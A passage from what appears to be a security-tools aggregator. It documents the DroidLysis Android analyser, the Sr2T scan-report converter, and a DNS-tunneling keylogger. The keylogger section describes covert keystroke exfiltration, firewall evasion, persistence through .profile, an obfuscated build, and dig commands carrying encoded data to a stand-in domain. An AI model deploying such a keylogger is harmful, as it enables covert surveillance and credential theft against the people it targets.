      $ source ./venv/bin/activate
      (venv) $ pip3 install git+https://github.com/cryptax/droidlysis

      Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

4. Configure conf/general.conf. In particular, make sure to replace /home/axelle with your own directories.
      [tools]
      apktool = /home/axelle/softs/apktool_2.9.3.jar
      baksmali = /home/axelle/softs/baksmali-2.5.2.jar
      dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
      procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
      keytool = /usr/bin/keytool
      ...
5. Run it:
      python3 ./droidlysis3.py --help

      Configuration

The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the names of the pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql).

      Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

      Usage

      DroidLysis uses Python 3. To launch it and get options:

      droidlysis --help

      For example, test it on Signal's APK:

      droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

      DroidLysis outputs:

      • A summary on the console (see image above)
      • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
      • A database (by default, SQLite droidlysis.db) containing properties it noticed.

      Options

      Get usage with droidlysis --help

• The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other types of files (unless there is a bug...) but won't be able to understand the content.

      • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

      • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

• DroidLysis's analysis does not inspect known third-party SDKs by default, i.e. it won't report any suspicious activity from them. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisement) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

      Sample output directory (--output DIR)

      This directory contains (when applicable):

      • A readable AndroidManifest.xml
      • Readable resources in res
      • Libraries lib, assets assets
      • Disassembled Smali code: smali (and others)
      • Package meta information: META-INF
      • Package contents when simply unzipped in ./unzipped
      • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

      The following files are generated by DroidLysis:

      • autoanalysis.md: lists each pattern DroidLysis detected and where.
      • report.md: same as what was printed on the console

      If you do not need the sample output directory to be generated, use the option --clearoutput.

      Import trackers from Exodus etc (--import-exodus)

      $ python3 ./droidlysis3.py --import-exodus --verbose
      Processing file: ./droidurl.pyc ...
      DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
      DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
      DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
      DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
      DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
      DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
      DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
      DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

      Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

SQLite database

If you want to process a directory of samples, you'll probably want to store the properties DroidLysis finds in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample. Each column is a property DroidLysis tracks.

      For example, to retrieve all filename, SHA256 sum and smali properties of the database:

      sqlite> select sha256, sanitized_basename, smali_properties from samples;
      f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
      ...
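
The same data can be queried from Python with the standard sqlite3 module. A minimal sketch, assuming the droidlysis.db schema shown above:

import json
import sqlite3

con = sqlite3.connect("droidlysis.db")
rows = con.execute(
    "SELECT sha256, sanitized_basename, smali_properties FROM samples")
for sha256, name, props_json in rows:
    props = json.loads(props_json)
    # e.g. flag every sample whose Smali code can send SMS messages
    if props.get("send_sms"):
        print(f"{name} ({sha256[:12]}...) matches send_sms")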

      Property patterns

      What DroidLysis detects can be configured and extended in the files of the ./conf directory.

A pattern consists of:

• a tag name: for example send_sms. This names the property and must be unique across the .conf file.
• a pattern: a regexp to be matched, e.g. ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is matched against Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
• a description (optional): explains the importance of the property and what it means.
      [send_sms]
      pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
      description=Sending SMS messages
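
To illustrate how such a pattern file is used (a sketch of the idea, not DroidLysis's actual code), reading a .conf section with configparser and matching its regexp against disassembled Smali could look like this; the Smali path is a hypothetical file from the output directory:

import configparser
import re

config = configparser.ConfigParser()
config.read("conf/smali.conf")

# Hypothetical path to one disassembled file from the output directory.
smali_code = open("smali/com/example/Main.smali").read()

for tag in config.sections():
    if re.search(config[tag]["pattern"], smali_code):
        print(f"[{tag}] {config[tag].get('description', '')}")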

      Importing Exodus Privacy Trackers

Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add the option --import-exodus to the droidlysis command line: this will parse the trackers Exodus Privacy knows about which aren't yet in your kit.conf, and append all new trackers to ~/.cache/droidlysis/kit.conf.
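
As a sketch of what such an import amounts to (not DroidLysis's code; the "name" and "code_signature" field names are assumptions based on the Exodus tracker schema), fetching the ETIP JSON endpoint seen in the log above and appending unknown sections could look like:

import configparser

import requests

ETIP_URL = "https://etip.exodus-privacy.eu.org/api/trackers/?format=json"

kit = configparser.ConfigParser()
kit.read("conf/kit.conf")

for tracker in requests.get(ETIP_URL, timeout=30).json():
    # Assumed field names in the ETIP schema.
    name = tracker.get("name", "").strip()
    pattern = tracker.get("code_signature", "")
    if name and pattern and not kit.has_section(name):
        kit.add_section(name)
        kit.set(name, "pattern", pattern)

# Write the merged config (illustrative; DroidLysis itself appends to
# ~/.cache/droidlysis/kit.conf).
with open("kit-new.conf", "w") as f:
    kit.write(f)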

      Afterwards, you may want to sort your kit.conf file:

import configparser
import collections
import os

config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(
    sorted(config._sections.items(), key=lambda t: t[0]))
with open('sorted.conf', 'w') as f:
    config.write(f)

      Updates

      • v3.4.6 - Detecting manifest feature that automatically loads APK at install
      • v3.4.5 - Creating a writable user kit.conf file
      • v3.4.4 - Bug fix #14
      • v3.4.3 - Using configuration files
      • v3.4.2 - Adding import of Exodus Privacy Trackers
      • v3.4.1 - Removed dependency to Androguard
      • v3.4.0 - Multidex support
      • v3.3.1 - Improving detection of Base64 strings
      • v3.3.0 - Dumping data to JSON
      • v3.2.1 - IP address detection
      • v3.2.0 - Dex2jar is optional
      • v3.1.0 - Detection of Base64 strings


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Sr2T - Converts Scanning Reports To A Tabular Format

      By: Zion3R β€” March 23rd 2024 at 11:30


      Scanning reports to tabular (sr2t)

      This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

      1. Nmap (XML);
      2. Nessus (XML);
      3. Nikto (XML);
      4. Dirble (XML);
      5. Testssl (JSON);
      6. Fortify (FPR).

      Rationale

      This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.
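
The core idea, flattening a scanner's XML into rows you can annotate, is simple. A minimal sketch for Nmap XML using only the Python standard library (an illustration of the concept, not sr2t's implementation):

import xml.etree.ElementTree as ET

def nmap_to_rows(path):
    """Yield (address, port, protocol, service, state) per scanned port."""
    for host in ET.parse(path).getroot().iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            svc = port.find("service")
            yield (addr, port.get("portid"), port.get("protocol"),
                   svc.get("name") if svc is not None else "",
                   port.find("state").get("state"))

for row in nmap_to_rows("example/nmap.xml"):
    print(",".join(row))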

      Dependencies

      1. argparse (dev-python/argparse);
      2. prettytable (dev-python/prettytable);
      3. python (dev-lang/python);
      4. xlsxwriter (dev-python/xlsxwriter).

      Install

      Using Pip:

      pip install --user sr2t

      Usage

      You can use sr2t in two ways:

• When installed as a package, call the installed script: sr2t --help.
• When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
      $ sr2t --help
      usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
      [--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
      [--testssl TESTSSL [TESTSSL ...]]
      [--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
      [--nmap-services] [--no-nessus-autoclassify]
      [--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
      [--nessus-tls-file NESSUS_TLS_FILE]
      [--nessus-x509-file NESSUS_X509_FILE]
      [--nessus-http-file NESSUS_HTTP_FILE]
      [--nessus-smb-file NESSUS_SMB_FILE]
      [--nessus-rdp-file NESSUS_RDP_FILE]
      [--nessus-ssh-file NESSUS_SSH_FILE]
      [--nessus-min-severity NESSUS_MIN_SEVERITY]
      [--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
      [--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]
[--fortify-details] [--annotation-width ANNOTATION_WIDTH]
      [-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
      [-oA OUTPUT_ALL]

      Converting scanning reports to a tabular format

      optional arguments:
      -h, --help show this help message and exit
      --nmap-state NMAP_STATE
      Specify the desired state to filter (e.g.
      open|filtered).
--nmap-services Specify to output a supplemental list of detected
      services.
      --no-nessus-autoclassify
      Specify to not autoclassify Nessus results.
      --nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
      Specify to override a custom Nessus autoclassify YAML
      file.
      --nessus-tls-file NESSUS_TLS_FILE
      Specify to override a custom Nessus TLS findings YAML
      file.
      --nessus-x509-file NESSUS_X509_FILE
      Specify to override a custom Nessus X.509 findings
      YAML file.
      --nessus-http-file NESSUS_HTTP_FILE
      Specify to override a custom Nessus HTTP findings YAML
      file.
      --nessus-smb-file NESSUS_SMB_FILE
      Specify to override a custom Nessus SMB findings YAML
      file.
      --nessus-rdp-file NESSUS_RDP_FILE
      Specify to override a custom Nessus RDP findings YAML
      file.
      --nessus-ssh-file NESSUS_SSH_FILE
      Specify to override a custom Nessus SSH findings YAML
      file.
      --nessus-min-severity NESSUS_MIN_SEVERITY
      Specify the minimum severity to output (e.g. 1).
      --nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
      Specify the width of the pluginid column (e.g. 30).
      --nessus-sort-by NESSUS_SORT_BY
      Specify to sort output by ip-address, port, plugin-id,
      plugin-name or severity.
      --nikto-description-width NIKTO_DESCRIPTION_WIDTH
      Specify the width of the description column (e.g. 30).
      --fortify-details Specify to include the Fortify abstracts, explanations
      and recommendations for each vulnerability.
      --annotation-width ANNOTATION_WIDTH
      Specify the width of the annotation column (e.g. 30).
      -oC OUTPUT_CSV, --output-csv OUTPUT_CSV
      Specify the output CSV basename (e.g. output).
      -oT OUTPUT_TXT, --output-txt OUTPUT_TXT
      Specify the output TXT file (e.g. output.txt).
      -oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the output XLSX file (e.g. output.xlsx). Only
      for Nessus at the moment
      -oA OUTPUT_ALL, --output-all OUTPUT_ALL
      Specify the output basename to output to all formats
      (e.g. output).

      specify at least one:
      --nessus NESSUS [NESSUS ...]
      Specify (multiple) Nessus XML files.
      --nmap NMAP [NMAP ...]
      Specify (multiple) Nmap XML files.
      --nikto NIKTO [NIKTO ...]
      Specify (multiple) Nikto XML files.
      --dirble DIRBLE [DIRBLE ...]
      Specify (multiple) Dirble XML files.
      --testssl TESTSSL [TESTSSL ...]
      Specify (multiple) Testssl JSON files.
      --fortify FORTIFY [FORTIFY ...]
      Specify (multiple) HP Fortify FPR files.

      Example

      A few examples

      Nessus

      To produce an XLSX format:

      $ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

To produce a text tabular format to stdout:

      $ sr2t --nessus example/nessus.nessus
      +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
      | host | port | plugin id | plugin name | severity | annotations |
      +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
      | 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
      | 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
      | 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
      | 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
      | 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
      | 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
      | 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
      | 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
      | 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
      | 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
      | 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
      | 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
      | 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
      | 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
      | 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
      | 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
      | 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
      | 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
      | 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
      | 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
      | 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
      +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+

      Or to output a CSV file:

      $ sr2t --nessus example/nessus.nessus -oC example
      $ cat example_nessus.csv
      host,port,plugin id,plugin name,severity,annotations
      192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
      192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
      192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
      192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
      192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
      192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
      192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
      192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
      192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
      192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
      192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
      192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
      192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
      192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
      192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
      192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
      192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
      192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
      192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
      192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
      192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
      192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,445,57608,SMB Signing not required,2,X

      Nmap

      To produce an XLSX format:

      $ sr2t --nmap example/nmap.xml -oX example.xlsx

To produce a text tabular format to stdout:

      $ sr2t --nmap example/nmap.xml --nmap-services
      Nmap TCP:
      +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
      | | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
      +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
      | 192.168.23.78 | X | | X | X | X | X | X | X | | |
      | 192.168.27.243 | | | | X | X | | X | X | X | X |
      | 192.168.99.164 | | | | X | X | | X | X | X | X |
      | 192.168.228.211 | | X | | | | | | | | |
      | 192.168.171.74 | | | | X | X | | X | X | X | X |
      +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+

      Nmap Services:
      +-----------------+------+-------+---------------+-------+
      | ip address | port | proto | service | state |
+-----------------+------+-------+---------------+-------+
      | 192.168.23.78 | 53 | tcp | domain | open |
      | 192.168.23.78 | 88 | tcp | kerberos-sec | open |
      | 192.168.23.78 | 135 | tcp | msrpc | open |
      | 192.168.23.78 | 139 | tcp | netbios-ssn | open |
      | 192.168.23.78 | 389 | tcp | ldap | open |
      | 192.168.23.78 | 445 | tcp | microsoft-ds | open |
      | 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
      | 192.168.27.243 | 135 | tcp | msrpc | open |
      | 192.168.27.243 | 139 | tcp | netbios-ssn | open |
      | 192.168.27.243 | 445 | tcp | microsoft-ds | open |
      | 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
      | 192.168.27.243 | 5800 | tcp | vnc-http | open |
      | 192.168.27.243 | 5900 | tcp | vnc | open |
      | 192.168.99.164 | 135 | tcp | msrpc | open |
      | 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192.168.99.164 | 445 | tcp | microsoft-ds | open |
      | 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
      | 192.168.99.164 | 5800 | tcp | vnc-http | open |
      | 192.168.99.164 | 5900 | tcp | vnc | open |
      | 192.168.228.211 | 80 | tcp | http | open |
      | 192.168.171.74 | 135 | tcp | msrpc | open |
      | 192.168.171.74 | 139 | tcp | netbios-ssn | open |
      | 192.168.171.74 | 445 | tcp | microsoft-ds | open |
      | 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
      | 192.168.171.74 | 5800 | tcp | vnc-http | open |
      | 192.168.171.74 | 5900 | tcp | vnc | open |
      +-----------------+------+-------+---------------+-------+

      Or to output a CSV file:

      $ sr2t --nmap example/nmap.xml -oC example
      $ cat example_nmap_tcp.csv
      ip address,53,80,88,135,139,389,445,3389,5800,5900
      192.168.23.78,X,,X,X,X,X,X,X,,
      192.168.27.243,,,,X,X,,X,X,X,X
      192.168.99.164,,,,X,X,,X,X,X,X
      192.168.228.211,,X,,,,,,,,
      192.168.171.74,,,,X,X,,X,X,X,X

      Nikto

      To produce an XLSX format:

      $ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

To produce a text tabular format to stdout:

      $ sr2t --nikto example/nikto.xml
      +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
      | target ip | target hostname | target port | description | annotations |
      +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
      | 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
      | 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
      | | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
      | | | | render the content of the site in a different fashion to the MIME type | |
      +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+

      Or to output a CSV file:

      $ sr2t --nikto example/nikto.xml -oC example
      $ cat example_nikto.csv
      target ip,target hostname,target port,description,annotations
      192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
      192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
      agent to protect against some forms of XSS",X
      192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
      render the content of the site in a different fashion to the MIME type",X

      Dirble

      To produce an XLSX format:

      $ sr2t --dirble example/dirble.xml -oX example.xlsx

To produce a text tabular format to stdout:

      $ sr2t --dirble example/dirble.xml
      +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
      | url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
      +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
      | http://example.org/flv | 0 | 0 | false | false | false | | X |
      | http://example.org/hire | 0 | 0 | false | false | false | | X |
      | http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | false | | X |
      | http://example.org/putty | 0 | 0 | false | false | false | | X |
      | http://example.org/receipts | 0 | 0 | false | false | false | | X |
      +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+

      Or to output a CSV file:

      $ sr2t --dirble example/dirble.xml -oC example
      $ cat example_dirble.csv
      url,code,content len,is directory,is listable,found from listable,redirect url,annotations
      http://example.org/flv,0,0,false,false,false,,X
      http://example.org/hire,0,0,false,false,false,,X
      http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
      http://example.org/print_order,0,0,false,false,false,,X
      http://example.org/putty,0,0,false,false,false,,X
      http://example.org/receipts,0,0,false,false,false,,X

      Testssl

      To produce an XLSX format:

      $ sr2t --testssl example/testssl.json -oX example.xlsx

To produce a text tabular format to stdout:

      $ sr2t --testssl example/testssl.json
      +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
      | ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
      +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
      | rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
      +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+

      Or to output a CSV file:

      $ sr2t --testssl example/testssl.json -oC example
      $ cat example_testssl.csv
      ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
      rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X

      Fortify

      To produce an XLSX format:

      $ sr2t --fortify example/fortify.fpr -oX example.xlsx

To produce a text tabular format to stdout:

      $ sr2t --fortify example/fortify.fpr
      +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
      | | type | subtype | severity | confidence | annotations |
      +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
      | example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
      | example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
      | example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
      | example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
      | example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
      | example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
      +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+

      Or to output a CSV file:

      $ sr2t --fortify example/fortify.fpr -oC example
      $ cat example_fortify.csv
      ,type,subtype,severity,confidence,annotations
      example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
      example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
      example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
      example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
      example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
      example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
      example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X

      Donate

      • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

      By: Zion3R β€” March 21st 2024 at 11:30


      This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

These tools excel at lightweight exfiltration and persistence, properties which help prevent detection. The keylogger uses DNS tunneling/exfiltration to bypass firewalls and avoid detection.


      Server

      Setup

      The server uses python3.

      To install dependencies, run python3 -m pip install -r requirements.txt

      Starting the Server

      To start the server, run python3 main.py

      usage: dns exfiltration server [-h] [-p PORT] ip domain

      positional arguments:
      ip
      domain

      options:
      -h, --help show this help message and exit
      -p PORT, --port PORT port to listen on

      By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

      ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

      domain is the domain to listen for, which should be the domain that the server is authoritative for.

      Registrar

On the registrar, you want to change your domain's nameservers to custom DNS.

      Point them to two domains, ns1.example.com and ns2.example.com.

Add records that point the nameserver domains to your exfiltration server's IP address.

      This is the same as setting glue records.

      Client

      Linux

The Linux keylogger consists of two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

      logger.sh

      # Usage: logger.sh [-options] domain
      # Positional Arguments:
      # domain: the domain to send data to
      # Options:
      # -p path: give path to log file to listen to
      # -l: run the logger with warnings and errors printed

      To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

      The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

      The -l option will show warnings and errors. Can be useful for debugging.

logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistence, you can add the command to .profile to start on every new interactive shell.

      connection.sh

      Usage: command [-options] domain
      Positional Arguments:
      domain: the domain to send data to
      Options:
      -n: number of characters to store before sending a packet

      Windows

      Build

To build the keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output a file named logger.exe in the build directory.

      make production domain=example.com

      You can also choose to build the program with debugging by making the debug target.

      make debug domain=example.com

      For both targets, you will need to specify the domain the server is listening for.

      Sending Test Requests

      You can use dig to send requests to the server:

dig @127.0.0.1 a.1.1.1.example.com A +short sends a connection request to a server on localhost.

dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short sends a test message to localhost.

      Replace example.com with the domain the server is listening for.

      Protocol

      Starting a Connection

A record requests starting with a indicate the start of a "connection." When the server receives one, it responds with a fake non-reserved IP address whose last octet contains the id of the client.

      The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

The server will respond with an IP address in the following format: 123.123.123.[id]

      Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

      Exfiltrating Data

      A record requests starting with b indicate exfiltrated data being sent to the server.

      The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

      The server will respond with [code].123.123.123

